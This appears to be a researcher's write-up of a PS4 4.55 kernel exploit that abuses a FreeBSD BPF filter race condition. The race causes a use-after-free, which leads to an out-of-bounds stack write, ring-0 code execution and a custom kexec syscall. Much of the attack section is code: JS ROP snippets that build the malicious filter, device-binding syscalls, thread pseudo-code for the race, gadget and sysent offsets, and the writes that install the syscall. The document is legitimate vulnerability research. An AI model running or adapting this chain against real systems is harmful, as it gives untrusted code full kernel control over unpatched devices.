b586e84 Mar 29, 2018

Note: While this bug is primarily interesting for exploitation on the PS4, this bug can also potentially be exploited on other unpatched platforms using FreeBSD if the attacker has read/write permissions on /dev/bpf, or if they want to escalate from root user to kernel code execution. As such, I've published it under the "FreeBSD" folder and not the "PS4" folder.

Introduction

Welcome to the kernel portion of the PS4 4.55FW full exploit chain write-up. This bug was found by qwerty, and is fairly unique in the way it's exploited, so I wanted to do a detailed write-up on how it worked. The full source of the exploit can be found here. I've previously covered the webkit exploit implementation for userland access here.

Throwback to 4.05

If you read my 4.05 kernel exploit write-up, you may have noticed that I left out how I managed to dump the kernel before obtaining code execution. I also left out the target object that was used before the cdev object. This target object was, indeed, bpf_d. Because this exploit involving BPF was not public at the time and was a 0-day, I omitted it from my write-up and rewrote the exploit to use an entirely different object (this turned out to be for the better, as cdev turned out to be more stable anyway).

BPF was a nice target object for 4.05: not only did it contain function pointers to jumpstart code execution, it also offered a way to obtain an arbitrary read primitive, which I will detail below. While it's not strictly needed, it is helpful because we don't have to write dumper code later. This section is not very relevant to the 4.55 exploit, so I will keep it brief; feel free to skip it if you only care about 4.55.

The bpf_d object has fields related to "slots" for storing data. Since this section is just a tidbit for an older exploit, I will only include the fields relevant to this section.

src

struct bpf_d {
    // ...
    caddr_t         bd_hbuf;        /* hold slot */ // Offset: 0x18
    // ...
    int             bd_hlen;        /* current length of hold buffer */ // Offset: 0x2C
    // ...
    int             bd_bufsize;     /* absolute length of buffers */ // Offset: 0x30
    // ...
}

These slots are used to hold the information that gets sent back to someone who would read() on the bpf's file descriptor. By setting the offset at 0x18 (bd_hbuf) to the address of the location we want to dump, and 0x2C and 0x30 (bd_hlen and bd_bufsize respectively) to any size we choose (to dump the entire kernel, I chose 0x2800000), we can obtain an arbitrary kernel read primitive via the read() system call on the bpf file descriptor, and easily dump kernel memory.

FreeBSD or Sony's fault? Why not both...

Interestingly, this bug is actually a FreeBSD bug and was not (at least directly) introduced by Sony code. However, it's not very useful on most systems because the /dev/bpf device driver is root-owned, and the permissions for it are set to 0600 (meaning the owner has read/write privileges, and nobody else does) - though it can be used for escalating from root to kernel mode code execution. Now let's take a look at the make_dev() call inside the PS4 kernel for /dev/bpf (taken from a 4.05 kernel dump).

seg000:FFFFFFFFA181F15B                 lea     rdi, unk_FFFFFFFFA2D77640
seg000:FFFFFFFFA181F162                 lea     r9, aBpf        ; "bpf"
seg000:FFFFFFFFA181F169                 mov     esi, 0
seg000:FFFFFFFFA181F16E                 mov     edx, 0
seg000:FFFFFFFFA181F173                 xor     ecx, ecx
seg000:FFFFFFFFA181F175                 mov     r8d, 1B6h
seg000:FFFFFFFFA181F17B                 xor     eax, eax
seg000:FFFFFFFFA181F17D                 mov     cs:qword_FFFFFFFFA34EC770, 0
seg000:FFFFFFFFA181F188                 call    make_dev

We see UID 0 (the UID for the root user) getting moved into the register for the 3rd argument (EDX), which is the owner argument. However, the permission bits (passed in R8D) are being set to 0x1B6, which in octal is 0666. This means anyone can open /dev/bpf with read/write privileges. I'm not sure why this is the case; qwerty speculates that perhaps bpf is used for LAN gaming. In any case, this was a poor design decision because bpf is usually considered privileged, and should not be accessible to a process that is completely untrusted, such as WebKit. On most platforms, permissions for /dev/bpf will be set to 0x180, or 0600.
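The hex-to-octal conversion above is easy to double-check. The following is only an illustrative sketch: `format_mode` is a hypothetical helper written for this write-up, not something taken from the kernel or the exploit. It renders the low nine permission bits the way `ls -l` would.

```c
#include <assert.h>
#include <string.h>

/* Hypothetical helper: render the low 9 permission bits of a mode as an
 * "rwxrwxrwx"-style string. buf must hold at least 10 bytes. */
void format_mode(unsigned mode, char buf[10])
{
    static const char flags[] = "rwxrwxrwx";

    assert(buf != NULL);
    for (int i = 0; i < 9; i++) {
        /* Bit 8 is owner-read, bit 0 is other-execute. */
        buf[i] = (mode & (1u << (8 - i))) ? flags[i] : '-';
    }
    buf[9] = '\0';
}

/* Returns 1 if the two modes discussed above render as expected. */
int check_bpf_modes(void)
{
    char ps4[10], usual[10];

    format_mode(0x1B6, ps4);    /* value passed to make_dev() on the PS4 */
    format_mode(0x180, usual);  /* value used on most platforms */
    return strcmp(ps4, "rw-rw-rw-") == 0 && strcmp(usual, "rw-------") == 0;
}
```

Calling `check_bpf_modes()` confirms that 0x1B6 grants read/write to everyone, while 0x180 grants it to the owner only.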

Race Conditions - What are they?

The class of the bug abused in this exploit is known as a "race condition". Before we get into bug specifics, it's important for the reader to understand what race conditions are and how they can be an issue (especially in something like a kernel). Often in complex software (such as a kernel), resources will be shared (or "global"). This means other threads could potentially execute code that will access some resource that could be accessed by another thread at the same point in time. What happens if one thread accesses this resource while another thread does without exclusive access? Race conditions are introduced.

Race conditions are scenarios where events can happen in a different order than the developer intended, leading to undefined behavior. In simple, single-threaded programs, this is not an issue because execution is linear. In more complex programs where code can run in parallel, however, it becomes a real issue. To prevent these problems, atomic instructions and locking mechanisms were introduced. When one thread wants to access a critical resource, it will attempt to acquire a "lock". If another thread is already using this resource, the thread attempting to acquire the lock will generally wait until the other thread is finished with it. Each thread must release the lock on the resource after it is done with it; failure to do so could result in a deadlock.

While locking mechanisms such as mutexes have been introduced, developers sometimes struggle to use them properly. For example, what if a piece of shared data gets validated and processed, but while the processing of the data is locked, the validation is not? There is a window between validation and locking where that data can change, and while the developer thinks the data has been validated, it could be substituted with something malicious after it is validated, but before it is used. Parallel programming can be difficult, especially when, as a developer, you also want to factor in the fact that you don't want to put too much code in between locking and unlocking as it can impact performance.
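To make the check/use window concrete, here is a minimal sketch using a POSIX threads mutex. Everything in it (`shared_len`, `set_shared_len`, `checked_copy`) is hypothetical and unrelated to the kernel code discussed later. The point is only that the validation and the use sit inside the same critical section, so the value that was checked is the value that gets used.

```c
#include <assert.h>
#include <pthread.h>
#include <stddef.h>
#include <string.h>

#define BUF_MAX 16

/* Hypothetical shared state: a length that other threads may update. */
static pthread_mutex_t shared_lock = PTHREAD_MUTEX_INITIALIZER;
static size_t shared_len = 8;

/* Update the shared length under the lock. */
void set_shared_len(size_t len)
{
    pthread_mutex_lock(&shared_lock);
    shared_len = len;
    pthread_mutex_unlock(&shared_lock);
}

/* Copy shared_len bytes from src into dst (capacity BUF_MAX).
 * Returns the number of bytes copied, or -1 if the length is invalid. */
int checked_copy(char dst[BUF_MAX], const char *src)
{
    int copied = -1;

    assert(dst != NULL && src != NULL);

    pthread_mutex_lock(&shared_lock);
    if (shared_len <= BUF_MAX) {          /* time of check */
        memcpy(dst, src, shared_len);     /* time of use   */
        copied = (int)shared_len;
    }
    pthread_mutex_unlock(&shared_lock);

    return copied;
}
```

If the check were done before taking the lock, another thread could call `set_shared_len()` between the check and the `memcpy()`, which is exactly the kind of window described above.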

For more on race conditions, see Microsoft's page on it here.

Packet Filters - What are they?

Since the bug is directly in the filter system, it is important to know the basics of what packet filters are. Filters are essentially sets of pseudo-instructions that are interpreted by bpf_filter(). While the pseudo-instruction set is fairly minimal, it allows you to do things like perform basic arithmetic operations and copy values around inside its buffer. Breaking down the BPF VM in its entirety is far beyond the scope of this write-up; just know that the filter code it interprets is run in kernel mode - this is why read/write access to /dev/bpf should be privileged.

You can reference the opcodes that the BPF VM takes here.

Out-of-bounds Write Primitive

If we take a look at the "STOREX" mnemonic's handler in bpf_filter(), we see the following code:

src

u_int32_t mem[BPF_MEMWORDS];
// ...
case BPF_STX:
    mem[pc->k] = X;
    continue;

This is immediately interesting to us as exploit developers. If we can set pc->k to any arbitrary value, we can use this to establish an out-of-bounds write primitive on the stack. This can be extremely helpful; for instance, we can use it to corrupt the return pointer stored on the stack so that when bpf_filter() returns we can start a ROP chain. This is perfect, because not only is it a trivial attack strategy to implement, but it is also stable as we don't have to worry about the issues that typically come with classic stack/heap smashing.

Unfortunately, instructions run through a validator, so trying to set pc->k in a way that would be outside the boundaries of mem will fail the validation check. But what if malicious instructions could be substituted in post-validation? There would be a "time of check, time of use" (TOCTOU) issue present.
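The check that gets in the way is conceptually simple. The sketch below is a heavily simplified stand-in for the store-related part of validation, not the real bpf_validate(): `toy_insn` and `toy_validate` are hypothetical names, and the real validator checks considerably more than this. Only the opcode class values (0x02 for BPF_ST, 0x03 for BPF_STX) and the scratch memory size of 16 words are taken from bpf.h.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define TOY_MEMWORDS 16            /* mirrors BPF_MEMWORDS */
#define TOY_CLASS(c) ((c) & 0x07)  /* low three bits select the class */
#define TOY_ST       0x02          /* same value as BPF_ST in bpf.h */
#define TOY_STX      0x03          /* same value as BPF_STX in bpf.h */

/* Hypothetical mirror of the 8-byte instruction format. */
struct toy_insn {
    uint16_t code;
    uint8_t  jt;
    uint8_t  jf;
    uint32_t k;
};

/* Return 1 if no store instruction indexes past the scratch memory,
 * 0 otherwise. Only the store check is modelled here. */
int toy_validate(const struct toy_insn *prog, size_t len)
{
    assert(prog != NULL);

    for (size_t i = 0; i < len; i++) {
        int cls = TOY_CLASS(prog[i].code);

        if ((cls == TOY_ST || cls == TOY_STX) && prog[i].k >= TOY_MEMWORDS)
            return 0;
    }
    return 1;
}
```

A store to index 0x0F passes this check and a store to index 0x1E fails it, which is why the instructions have to be swapped in after validation rather than submitted directly.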

Race, Replace

Setting Filters

If we take a look at bpfioctl(), you'll notice there are various commands for managing the interface, setting buffer properties, and of course, setting up read/write filters (a list of these commands can be found on the FreeBSD man page). If we pass the "BIOCSETWF" command (0x8010427B as a raw value), you'll notice that bpf_setf() is called to set a filter on the given device.

src

case BIOCSETF:
case BIOCSETFNR:
case BIOCSETWF:
#ifdef COMPAT_FREEBSD32
case BIOCSETF32:
case BIOCSETFNR32:
case BIOCSETWF32:
#endif
    error = bpf_setf(d, (struct bpf_program *)addr, cmd);
    break;
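The raw command value 0x8010427B is not arbitrary: it follows the usual BSD ioctl encoding. The sketch below rebuilds and decodes it. The bit layout is assumed from FreeBSD's sys/ioccom.h (direction bit in the top bits, a 13-bit parameter length at bit 16, a group character at bit 8, and the command number in the low byte), and the `toy_` names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

#define TOY_IOC_IN       0x80000000u  /* parameters are copied in */
#define TOY_IOCPARM_MASK 0x1fffu      /* 13-bit parameter length */

struct toy_ioctl {
    int      copies_in;  /* 1 if the kernel copies the argument in */
    unsigned len;        /* size of the argument structure in bytes */
    char     group;      /* subsystem letter, 'B' for bpf */
    unsigned num;        /* command number within the group */
};

/* Build a "write"-style ioctl number, analogous to the _IOW() macro. */
uint32_t toy_iow(char group, unsigned num, unsigned len)
{
    assert(num <= 0xff);
    return TOY_IOC_IN | ((len & TOY_IOCPARM_MASK) << 16)
         | ((uint32_t)(unsigned char)group << 8) | num;
}

/* Split an ioctl number back into its fields. */
struct toy_ioctl toy_decode(uint32_t cmd)
{
    struct toy_ioctl out;

    out.copies_in = (cmd & TOY_IOC_IN) != 0;
    out.len       = (cmd >> 16) & TOY_IOCPARM_MASK;
    out.group     = (char)((cmd >> 8) & 0xff);
    out.num       = cmd & 0xff;
    return out;
}
```

Under these assumptions, `toy_iow('B', 123, 0x10)` yields 0x8010427B: group 'B', command 123, and a 16-byte argument, which is the size of the bpf_program structure shown later in this write-up.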

If you look at where the instructions are copied into kernel, you'll also see that bpf_validate() will run immediately, meaning at this point we cannot specify a pc->k value that allows out-of-bounds access.

src

// ...

size = flen * sizeof(*fp->bf_insns);
fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);

if (copyin((caddr_t)fp->bf_insns, (caddr_t)fcode, size) == 0 && bpf_validate(fcode, (int)flen)) {
    // ...
}

// ...

Lack of Ownership

We've taken a look at the code that sets a filter, now let's take a look at the code that uses a filter. The function bpfwrite() is called when a process calls the write() system call on a valid bpf device. We can see this via the following function table for bpf's backing cdevsw:

src

static struct cdevsw bpf_cdevsw = {
    .d_version =    D_VERSION,
    .d_open =       bpfopen,
    .d_read =       bpfread,
    .d_write =      bpfwrite,
    .d_ioctl =      bpfioctl,
    .d_poll =       bpfpoll,
    .d_name =       "bpf",
    .d_kqfilter =   bpfkqfilter,
};

The purpose of bpfwrite() is to allow the user to write packets to the interface. Any packets passed into bpfwrite() will pass through the write filter that is set on the interface, which is set via the IOCTL that is detailed in the "Setting Filters" sub-section.

It first does some privilege checks (which are irrelevant because on the PS4, any untrusted process can successfully write to it due to everyone having R/W permissions on the device), and sets up some buffers before calling bpf_movein().

src

bzero(&dst, sizeof(dst));
m = NULL;
hlen = 0;
error = bpf_movein(uio, (int)d->bd_bif->bif_dlt, ifp, &m, &dst, &hlen, d->bd_wfilter);
if (error) {
	d->bd_wdcount++;
	return (error);
}
d->bd_wfcount++;

Let's take a look at bpf_movein().

src

*mp = m;

if (m->m_len < hlen) {
    error = EPERM;
    goto bad;
}

error = uiomove(mtod(m, u_char *), len, uio);
if (error)
    goto bad;
  
slen = bpf_filter(wfilter, mtod(m, u_char *), len, len);
if (slen == 0) {
    error = EPERM;
    goto bad;
}

Notice, there is absolutely no locking present in bpf_movein(), nor in bpfwrite() - the caller. Therefore, bpf_filter(), the function that executes a given filter program on the device, is called in an unlocked state. Additionally, bpf_filter() itself doesn't do any locking. No ownership is maintained or even obtained in the process of executing the write filter. What would happen if this filter was free()'d after it was validated via bpf_setf() when setting the filter, and was reallocated with invalid instructions while the filter is executing? :)

By racing three threads (one setting a valid, non-malicious filter, one setting an invalid, malicious filter, and one trying to continuously write() to bpf), there is a possible (and very exploitable) scenario where valid instructions can be replaced with invalid instructions, and we can influence pc->k to write out-of-bounds on the stack.

Freeing the Filter

We need a method to free() the filter in another thread while it's still running to trigger a use-after-free situation. Looking at bpf_setf(), notice that before allocating a new buffer for the filter instructions, it will first check if there is an old one - if there is, it will destroy it.

src

static int bpf_setf(struct bpf_d *d, struct bpf_program *fp, u_long cmd) {
    struct bpf_insn *fcode, *old;
    
    // ...
    
    if (cmd == BIOCSETWF) {
        old = d->bd_wfilter;
        wfilter = 1;
        // ...
    } else {
        wfilter = 0;
        old = d->bd_rfilter;
        // ...
    }
    
    // ...
    
    if (old != NULL)
        free((caddr_t)old, M_BPF);
        
    // ...
    
    fcode = (struct bpf_insn *)malloc(size, M_BPF, M_WAITOK);
    
    // ...
    
    if (wfilter)
        d->bd_wfilter = fcode;
    else {
        d->bd_rfilter = fcode;
        // ...
        if (cmd == BIOCSETF)
            reset_d(d);
    }
    
    // ...
}

Because bpf_filter() has a copy of d->bd_wfilter, when it is free()'d in one thread to replace the filter, the second thread will also use the same pointer (which is now free()'d) resulting in a use-after-free(). The thread attempting to set an invalid filter effectively ends up spraying the heap as a result, and will eventually get allocated into the same address. Our three threads will do the following:

  1. Continuously set a filter with valid instructions, passing the validation checks.
  2. Continuously set another filter with invalid instructions, freeing and replacing the old instructions with new ones (our malicious ones).
  3. Continuously write to bpf. Eventually, the "valid" filter will be corrupted with the invalid one post-validation and write() will use it, resulting in memory corruption. Specially crafted instructions can be used to overwrite the return address on the stack to obtain code execution in kernel mode.

Setting a Valid Program

First, we need to set up a bpf_program object to pass to the ioctl() for setting a filter. The structure for bpf_program is below:

src

struct bpf_program {                // Size: 0x10
    u_int bf_len;                   // 0x00
    struct bpf_insn *bf_insns;      // 0x08
};

It's important to note that bf_len is not the size of the program's instructions in bytes, but rather the number of instructions. This means the value we specify for bf_len will be the total size of our instructions in memory divided by the size of an instruction, which is eight bytes.

src

struct bpf_insn {                   // Size: 0x08
    u_short         code;           // 0x00
    u_char          jt;             // 0x02
    u_char          jf;             // 0x03
    bpf_u_int32     k;              // 0x04
};
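The relationship between byte size and bf_len can be written down directly. This is a small sketch with hypothetical names (`bpf_insn_layout`, `insn_count`); the struct only mirrors the field layout shown above using fixed-width types.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical mirror of struct bpf_insn using fixed-width types. */
struct bpf_insn_layout {
    uint16_t code;  /* 0x00 */
    uint8_t  jt;    /* 0x02 */
    uint8_t  jf;    /* 0x03 */
    uint32_t k;     /* 0x04 */
};

static_assert(sizeof(struct bpf_insn_layout) == 8,
              "each pseudo-instruction occupies eight bytes");

/* Convert a program size in bytes into an instruction count,
 * i.e. the value that belongs in bf_len. */
size_t insn_count(size_t bytes)
{
    assert(bytes % sizeof(struct bpf_insn_layout) == 0);
    return bytes / sizeof(struct bpf_insn_layout);
}
```

For example, a program occupying 0x48 bytes gives `insn_count(0x48) == 9`.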

A valid program is easy to write: we can simply write a bunch of NOP (no operation) pseudo-instructions with a "return" pseudo-instruction at the end. By looking at bpf.h, we can determine that the opcodes we can use for a NOP and a RET are 0x00 and 0x06 respectively.

src

#define         BPF_LD          0x00 // By specifying 0's for the args it effectively does nothing
#define         BPF_RET         0x06

Below is a code snippet from the exploit implemented in JS ROP chains to set up a valid BPF program in memory:

// Setup valid program
var bpf_valid_prog          = malloc(0x10);
var bpf_valid_instructions  = malloc(0x80);

p.write8(bpf_valid_instructions.add32(0x00), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x08), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x10), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x18), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x20), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x28), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x30), 0x00000000);
p.write8(bpf_valid_instructions.add32(0x38), 0x00000000);
p.write4(bpf_valid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_valid_instructions.add32(0x44), 0x00000000);

p.write8(bpf_valid_prog.add32(0x00), 0x00000009);
p.write8(bpf_valid_prog.add32(0x08), bpf_valid_instructions);
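For readers more comfortable with C than with raw memory writes, the same harmless program can be sketched as follows. This is an illustration only, not code from the exploit: `filter_insn` and `build_nop_filter` are hypothetical names, and the opcode values are the two quoted from bpf.h above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define OP_NOP 0x00  /* BPF_LD with zeroed operands, as described above */
#define OP_RET 0x06  /* BPF_RET */

/* Hypothetical mirror of the 8-byte instruction format. */
struct filter_insn {
    uint16_t code;
    uint8_t  jt;
    uint8_t  jf;
    uint32_t k;
};

/* Fill out[0..count-1] with (count - 1) NOPs followed by one RET.
 * Returns the instruction count, which is the value bf_len expects. */
size_t build_nop_filter(struct filter_insn *out, size_t count)
{
    assert(out != NULL && count >= 1);

    memset(out, OP_NOP, count * sizeof(*out));  /* all-zero insn == NOP */
    out[count - 1].code = OP_RET;
    out[count - 1].k = 0;
    return count;
}
```

With `count` set to 9, the RET lands at byte offset 0x40, matching the layout written by the snippet above.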

Setting an Invalid Program

This program is where we want to write our malicious code that will corrupt memory on the stack when executed via write(). This program is almost as simple as the valid program, as it only contains 9 pseudo-instructions. We can abuse the "LDX" and "STX" instructions to write data on the stack by first loading the 32-bit value we want to write into the index register, then storing the index register into an index of what should be scratch memory. Because the instructions are invalid, however, the store will actually write out-of-bounds and corrupt the function's return pointer. Here is an outline of the instructions we want to run in our malicious filter:

LDX X <- {lower 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1E] <- X
LDX X <- {upper 32-bits of stack pivot gadget address (pop rsp)}
STX M[0x1F] <- X
LDX X <- {lower 32-bits of kernel ROP chain fake stack address}
STX M[0x20] <- X
LDX X <- {upper 32-bits of kernel ROP chain fake stack address}
STX M[0x21] <- X
RET

Note that mem is an array of u_int32_t, which is why our store indexes increase by 1 rather than by 4. Let's take a look at mem's full definition:

src

#define BPF_MEMWORDS 16
// ...
u_int32_t mem[BPF_MEMWORDS];

Notice, the buffer is only allocated for 64 bytes (16 values * 4 bytes per value) - but our instructions are accessing indexes 30, 31, 32, and 33, which are obviously way out of bounds of the buffer. Because the filter was substituted in post-validation, nothing catches this and thus an OOB write is born.
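The arithmetic is worth spelling out. The sketch below uses hypothetical helper names and only restates the sizes involved: 16 slots of 4 bytes each, and the byte offset from the start of mem that a given index corresponds to.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define MEMWORDS 16  /* mirrors BPF_MEMWORDS */

static_assert(MEMWORDS * sizeof(uint32_t) == 64,
              "the scratch memory is 64 bytes in total");

/* Total size of the scratch memory in bytes. */
size_t mem_size_bytes(void)
{
    return MEMWORDS * sizeof(uint32_t);
}

/* Byte offset from the start of mem that index i refers to. */
size_t slot_byte_offset(size_t index)
{
    return index * sizeof(uint32_t);
}

/* 1 if the index is a legitimate scratch slot, 0 otherwise. */
int slot_in_bounds(size_t index)
{
    return index < MEMWORDS;
}
```

Index 0x1E corresponds to byte offset 0x78, well past the 0x40 bytes that mem actually occupies.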

Indexes 0x1E and 0x1F (30 and 31) are the location on the stack of the return address. By overwriting it with the address of a pop rsp; ret; gadget and writing the value we want to pop into the RSP register at indexes 0x20 and 0x21 (32 and 33), we can successfully pivot the stack to that of our fake stack for our kernel ROP chain to obtain code execution in ring0.
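Each 64-bit value takes two consecutive 32-bit slots because the index register is only 32 bits wide; on little-endian x86-64, the lower index holds the lower half. A minimal sketch of that split, using hypothetical names and a made-up placeholder value rather than any real address:

```c
#include <assert.h>
#include <stdint.h>

/* The two 32-bit halves of a 64-bit value, in memory order on a
 * little-endian machine (low half first). */
struct halves {
    uint32_t low;
    uint32_t hi;
};

static_assert(sizeof(struct halves) == 8, "two 32-bit slots per qword");

/* Split a 64-bit value into its lower and upper 32 bits. */
struct halves split64(uint64_t value)
{
    struct halves h;

    h.low = (uint32_t)(value & 0xffffffffu);
    h.hi  = (uint32_t)(value >> 32);
    return h;
}

/* Reassemble the original 64-bit value from its halves. */
uint64_t join64(struct halves h)
{
    return ((uint64_t)h.hi << 32) | h.low;
}
```

For the placeholder 0x1122334455667788, `split64` gives a low half of 0x55667788 and a high half of 0x11223344, which is the same low/hi pairing used in the instruction outline above.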

Below is a code snippet from the exploit to set up an invalid, malicious BPF program in memory:

// Setup invalid program
var entry = window.gadgets["pop rsp"];
var bpf_invalid_prog          = malloc(0x10);
var bpf_invalid_instructions  = malloc(0x80);

p.write4(bpf_invalid_instructions.add32(0x00), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x04), entry.low);
p.write4(bpf_invalid_instructions.add32(0x08), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x0C), 0x0000001E);
p.write4(bpf_invalid_instructions.add32(0x10), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x14), entry.hi);
p.write4(bpf_invalid_instructions.add32(0x18), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x1C), 0x0000001F);
p.write4(bpf_invalid_instructions.add32(0x20), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x24), kchainstack.low);
p.write4(bpf_invalid_instructions.add32(0x28), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x2C), 0x00000020);
p.write4(bpf_invalid_instructions.add32(0x30), 0x00000001);
p.write4(bpf_invalid_instructions.add32(0x34), kchainstack.hi);
p.write4(bpf_invalid_instructions.add32(0x38), 0x00000003);
p.write4(bpf_invalid_instructions.add32(0x3C), 0x00000021);
p.write4(bpf_invalid_instructions.add32(0x40), 0x00000006);
p.write4(bpf_invalid_instructions.add32(0x44), 0x00000001);

p.write8(bpf_invalid_prog.add32(0x00), 0x00000009);
p.write8(bpf_invalid_prog.add32(0x08), bpf_invalid_instructions);

Creating and Binding Devices

To set up the corruption portion of the race, we need to open two instances of /dev/bpf. We will then bind them to a valid interface - which interface to bind to depends on how the system is connected to the network. For a wired (ethernet) connection, you'll want to bind to the "eth0" interface; for a wifi connection, you'll want to bind to the "wlan0" interface. The exploit automatically determines which interface to use by performing a test. The test attempts to write() to the given interface; if the interface is invalid, write() will fail and return -1. If this occurs after binding to the "eth0" interface, the exploit will attempt to rebind to "wlan0" and check again. If write() again returns -1, the exploit bails and reports that it failed to bind the device.

// Open first device and bind
var fd1 = p.syscall("sys_open", stringify("/dev/bpf"), 2, 0); // 0666 permissions, open as O_RDWR

p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("eth0")); // 8020426C = BIOCSETIF

if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
    p.syscall("sys_ioctl", fd1, 0x8020426C, stringify("wlan0"));

    if (p.syscall("sys_write", fd1, spadp, 40).low == (-1 >>> 0)) {
        throw "Failed to bind to first /dev/bpf device!";
    }
}

The same process is then repeated for the second device.

Setting Filters in Parallel

To cause memory corruption we need two threads running in parallel which continuously set filters on their own devices. Eventually, the valid filter will be free()'d, reallocated, and corrupted with the invalid filter. To do this, each thread essentially does the following (pseudo-code):

// 0x8010427B = BIOCSETWF
void threadOne() // Sets a valid program
{
    for(;;)
    {
        ioctl(fd1, 0x8010427B, bpf_valid_program);
    }
}

void threadTwo() // Sets an invalid program
{
    for(;;)
    {
        ioctl(fd2, 0x8010427B, bpf_invalid_program);
    }
}

Triggering Code Execution

So we can corrupt the filters and substitute in our invalid instructions, but we need the filter to actually get run to trigger code execution via the corrupted return address. Since we're setting a "write" filter, bpfwrite() is a perfect candidate to do this. This means we need a third thread that will constantly write() to the first bpf device. When the filter eventually gets corrupted, the next write() will run the invalid filter, causing the stack memory to be corrupted, and will jump to any address we specify, allowing us to (fairly trivially) obtain code execution in ring0.

void threadThree() // Tries to trigger code execution
{
    void *scratch = malloc(0x200);

    for(;;)
    {
        // write() returns a signed byte count (-1 on failure)
        ssize_t n = write(fd1, scratch, 0x200);

        if(n == 0x200)
        {
            break;
        }
    }
}

Installing a "kexec()" syscall

Our ultimate goal with the kROP chain is to install a custom system call that will execute code in kernel mode. To keep things consistent with 4.05, we again will use syscall #11. The signature of the syscall will be as follows:

sys_kexec(void *code, void *uap);

Doing this is fairly trivial; we just have to add an entry into the sysent table. An entry in the sysent table follows this structure:

src

struct sysent {		        	/* system call table */
	int	sy_narg;	        /* number of arguments */
	sy_call_t *sy_call;	    	/* implementing function */
	au_event_t sy_auevent;		/* audit event associated with syscall */
	systrace_args_func_t sy_systrace_args_func;
				        /* optional argument conversion function. */
	u_int32_t sy_entry;	    	/* DTrace entry ID for systrace. */
	u_int32_t sy_return;		/* DTrace return ID for systrace. */
	u_int32_t sy_flags;	    	/* General flags for system calls. */
	u_int32_t sy_thrcnt;
};

Our main points of interest are sy_narg and sy_call. We'll want to set sy_narg to 2 (one for the address to execute, the second for passing arguments). The sy_call member we'll want to set to a gadget that jumps to the address stored at the location RSI points to, since the syscall arguments are passed through a pointer in RSI and the first of them is the address of the code to execute (remember, while the first argument is normally passed in the RDI register, in syscalls RDI is occupied by the thread descriptor td). A jmp qword ptr [rsi] gadget does what we need, and can be found in the kernel at offset 0x13a39f.

LOAD:FFFFFFFF8233A39F       FF 26          jmp qword ptr [rsi] 

In a 4.55 kernel dump, we can see the offset for the sysent entry for syscall 11 is 0xC2B8A0. As you can see, the implementing function is nosys, so it's perfectly fine to overwrite.

_61000010:FFFFFFFF8322B8A0                 dq 0                    ; Syscall #11
_61000010:FFFFFFFF8322B8A8                 dq offset nosys
_61000010:FFFFFFFF8322B8B0                 dq 0
_61000010:FFFFFFFF8322B8B8                 dq 0
_61000010:FFFFFFFF8322B8C0                 dq 0
_61000010:FFFFFFFF8322B8C8                 dq 400000000h

By writing 2 to 0xC2B8A0, [kernel base + 0x13a39f] to 0xC2B8A8, and 0x100000000 to 0xC2B8C8 (we want to change the flags from SY_THR_ABSENT to SY_THR_STATIC), we can successfully insert a custom system call that will execute any code given in kernel mode!
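Why these three locations? The offsets fall out of the structure layout. The sketch below mirrors the sysent struct shown earlier using fixed-width types; it assumes a 64-bit target and a 16-bit au_event_t, and `toy_sysent` and `pack_flags_thrcnt` are hypothetical names. It also shows how a single 64-bit write at +0x28 covers both sy_flags (low dword) and sy_thrcnt (high dword).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Stand-in for struct sysent on an LP64 target (assumed layout). */
struct toy_sysent {
    int32_t  sy_narg;                /* +0x00 */
    void    *sy_call;                /* +0x08 */
    uint16_t sy_auevent;             /* +0x10 */
    void    *sy_systrace_args_func;  /* +0x18 */
    uint32_t sy_entry;               /* +0x20 */
    uint32_t sy_return;              /* +0x24 */
    uint32_t sy_flags;               /* +0x28 */
    uint32_t sy_thrcnt;              /* +0x2C */
};

static_assert(sizeof(void *) == 8, "sketch assumes a 64-bit target");
static_assert(sizeof(struct toy_sysent) == 0x30, "six qwords per entry");
static_assert(offsetof(struct toy_sysent, sy_call) == 0x08, "sy_call");
static_assert(offsetof(struct toy_sysent, sy_flags) == 0x28, "sy_flags");
static_assert(offsetof(struct toy_sysent, sy_thrcnt) == 0x2C, "sy_thrcnt");

/* Value of the qword at +0x28 on a little-endian machine. */
uint64_t pack_flags_thrcnt(uint32_t flags, uint32_t thrcnt)
{
    return ((uint64_t)thrcnt << 32) | flags;
}
```

With sy_flags left at 0, a sy_thrcnt of 4 packs to the 400000000h seen in the dump, and a sy_thrcnt of 1 packs to 0x100000000.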

Sony's "Patch"

The section header is a lie. Sony didn't actually patch this issue, however they did know that something wonky was going on with BPF as a crash dump accidentally made it to Sony servers from a kernel panic. Via a simple stack trace, they determined that the return address of bpfwrite() was corrupted. Sony couldn't seem to figure out how, so they decided to just strip bpfwrite() out of the kernel entirely - the #SonyWay. Luckily for them, after many hours of searching, it seems there are no other useful primitives to leverage the filter corruption, so the bug is sadly dead.

Pre-Patch BPF cdevsw:

bpf_devsw       dd 17122009h            ; d_version
                                        ; DATA XREF: sub_FFFFFFFFA181F140+1B↑o
                dd 80000000h            ; d_flags
                dq 0FFFFFFFFA1C92250h   ; d_name
                dq 0FFFFFFFFA181F1B0h   ; d_open
                dq 0                    ; d_fdopen
                dq 0FFFFFFFFA16FD1C0h   ; d_close
                dq 0FFFFFFFFA181F290h   ; d_read
                dq 0FFFFFFFFA181F5D0h   ; d_write
                dq 0FFFFFFFFA181FA40h   ; d_ioctl
                dq 0FFFFFFFFA1820B30h   ; d_poll
